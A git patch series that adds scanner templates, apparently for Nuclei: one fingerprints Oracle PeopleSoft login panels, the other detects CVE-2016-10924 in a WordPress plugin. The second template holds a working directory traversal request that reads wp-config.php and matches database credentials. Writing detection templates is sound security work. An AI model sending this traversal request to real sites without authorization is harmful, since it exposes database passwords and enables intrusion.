From e914bf88dfa641336c6150f0828cfe8122913bbd Mon Sep 17 00:00:00 2001
From: idealphase <mynameisphase@gmail.com>
Date: Mon, 22 Nov 2021 12:47:19 +0700
Subject: [PATCH 1/4] Added oracle-people-sign-in.yaml

Added oracle-people-sign-in.yaml
---
 exposed-panels/oracle-people-sign-in.yaml | 28 +++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 exposed-panels/oracle-people-sign-in.yaml

diff --git a/exposed-panels/oracle-people-sign-in.yaml b/exposed-panels/oracle-people-sign-in.yaml
new file mode 100644
index 0000000000..7f1d592d15
--- /dev/null
+++ b/exposed-panels/oracle-people-sign-in.yaml
@@ -0,0 +1,28 @@
+id: oracle-people-sign-in
+
+info:
+  name: Oracle Peoplesoft Sign-in
+  author: idealphase
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+PeopleSoft+Sign-in%22
+  tags: oracle,login,panel
+
+requests:
+  - method: GET
+    redirects: true
+    max-redirects: 2
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        condition: or
+        words:
+          - '<title>Oracle PeopleSoft Sign-in</title>'
+          - 'alt="Oracle PeopleSoft Sign-in" title="Oracle PeopleSoft Sign-in"'
+        part: body
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file

From c4186186028c4e34987b570f4ae6f97ff7585a43 Mon Sep 17 00:00:00 2001
From: idealphase <mynameisphase@gmail.com>
Date: Wed, 24 Nov 2021 19:58:55 +0700
Subject: [PATCH 2/4] Create wordpress-ebook-download-lfi.yaml

Create wordpress-ebook-download-lfi.yaml
---
 .../wordpress-ebook-download-lfi.yaml         | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml

diff --git a/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml b/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml
new file mode 100644
index 0000000000..0e1fb7249d
--- /dev/null
+++ b/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml
@@ -0,0 +1,29 @@
+id: wp-ebook-download-lfi
+
+info:
+  name: Wordpress eBook Download < 1.2 - Directory Traversal
+  author: idealphase
+  severity: high
+  description: The Wordpress eBook Download plugin was affected by a filedownload.php Local File Inclusion security vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
+    - https://www.exploit-db.com/exploits/39575
+  tags: wordpress,wp-plugin,lfi,wordpress,ebook
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200

From 566361897c8bbc96a342c6f9f3c9812e82bd720f Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Thu, 25 Nov 2021 03:21:36 +0530
Subject: [PATCH 3/4] moving template of cves folder

---
 .../2016/CVE-2016-10924.yaml                                 | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
 rename vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml => cves/2016/CVE-2016-10924.yaml (85%)

diff --git a/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml b/cves/2016/CVE-2016-10924.yaml
similarity index 85%
rename from vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml
rename to cves/2016/CVE-2016-10924.yaml
index 0e1fb7249d..eb3d47e11d 100644
--- a/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml
+++ b/cves/2016/CVE-2016-10924.yaml
@@ -1,4 +1,4 @@
-id: wp-ebook-download-lfi
+id: CVE-2016-10924
 
 info:
   name: Wordpress eBook Download < 1.2 - Directory Traversal
@@ -8,7 +8,8 @@ info:
   reference:
     - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
     - https://www.exploit-db.com/exploits/39575
-  tags: wordpress,wp-plugin,lfi,wordpress,ebook
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-10924
+  tags: cve,cve2021,wp-plugin,lfi,wordpress,ebook
 
 requests:
   - method: GET

From 27623ba276e7ba5c1c4bed0ed0fd890b9dfa5cde Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Thu, 25 Nov 2021 03:25:14 +0530
Subject: [PATCH 4/4] updated reference to metadata

---
 exposed-panels/oracle-people-sign-in.yaml | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/exposed-panels/oracle-people-sign-in.yaml b/exposed-panels/oracle-people-sign-in.yaml
index 7f1d592d15..8a0f17ca59 100644
--- a/exposed-panels/oracle-people-sign-in.yaml
+++ b/exposed-panels/oracle-people-sign-in.yaml
@@ -4,24 +4,25 @@ info:
   name: Oracle Peoplesoft Sign-in
   author: idealphase
   severity: info
-  reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+PeopleSoft+Sign-in%22
-  tags: oracle,login,panel
+  tags: oracle,panel
+  metadata:
+    shodan-query: http.title:"Oracle PeopleSoft Sign-in"
 
 requests:
   - method: GET
-    redirects: true
-    max-redirects: 2
     path:
       - '{{BaseURL}}'
 
+    redirects: true
+    max-redirects: 2
     matchers-condition: and
     matchers:
       - type: word
-        condition: or
+        part: body
         words:
           - '<title>Oracle PeopleSoft Sign-in</title>'
           - 'alt="Oracle PeopleSoft Sign-in" title="Oracle PeopleSoft Sign-in"'
-        part: body
+        condition: or
 
       - type: status
         status: